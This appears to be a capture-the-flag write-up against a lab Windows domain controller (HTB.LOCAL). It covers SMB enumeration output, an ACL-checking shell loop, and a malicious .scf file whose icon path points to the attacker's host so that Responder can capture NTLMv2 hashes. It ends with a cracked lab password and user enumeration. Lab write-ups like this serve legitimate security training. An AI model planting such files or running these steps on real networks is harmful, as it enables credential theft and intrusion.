SMB
PORT STATE SERVICE REASON VERSION
445/tcp open microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2.0.2
| 2.1
| 3.0
| 3.0.2
|_ 3.1.1
|_smb-print-text: false
| smb2-time:
| date: 2022-08-11T15:35:38
|_ start_date: 2022-08-11T15:33:45
| smb2-capabilities:
| 2.0.2:
| Distributed File System
| 2.1:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0.2:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.1.1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERRORSMB NULL SHARES
dr--r--r-- 0 Mon Jul 2 15:16:54 2018 2018
.\Department Shares\Users\*
dr--r--r-- 0 Tue Jul 10 17:39:32 2018 .
dr--r--r-- 0 Tue Jul 10 17:39:32 2018 ..
dr--r--r-- 0 Mon Jul 2 15:18:43 2018 amanda
dr--r--r-- 0 Mon Jul 2 15:19:06 2018 amanda_adm
dr--r--r-- 0 Mon Jul 2 15:18:28 2018 bill
dr--r--r-- 0 Mon Jul 2 15:18:31 2018 bob
dr--r--r-- 0 Mon Jul 2 15:19:14 2018 chris
dr--r--r-- 0 Mon Jul 2 15:18:39 2018 henry
dr--r--r-- 0 Mon Jul 2 15:18:34 2018 joe
dr--r--r-- 0 Mon Jul 2 15:18:53 2018 jose
dr--r--r-- 0 Tue Jul 10 17:39:32 2018 lkys37en
dr--r--r-- 0 Mon Jul 2 15:18:48 2018 morgan
dr--r--r-- 0 Mon Jul 2 15:19:20 2018 mrb3n
dr--r--r-- 0 Wed Sep 26 01:45:32 2018 PublicWas able to get a list of other users who I might be able to roast.
Unfortunately for us kerberos isnt open to the public therefore that is why we were unable to execute AESEPRoast attacks.
However after mounting hte share we were able to see the users and the permissions to these folders.
Using the followowing Script
tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm
[*] Enumerating Permissions in the Public:
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
Since we have write acess to the Public folder there is many ways that we coudl get a shell out of this, we coudl possibly steal hashes as well as possibly putting files like an hta file.
After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.
[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop
Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.
smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'
[+] IP: 10.10.10.103:445 Name: HTB.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
We could have additional permisisons to access other shares.
RPC
user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[amanda] rid:[0x450] user:[mrlky] rid:[0x643] user:[sizzler] rid:[0x644]
Last updated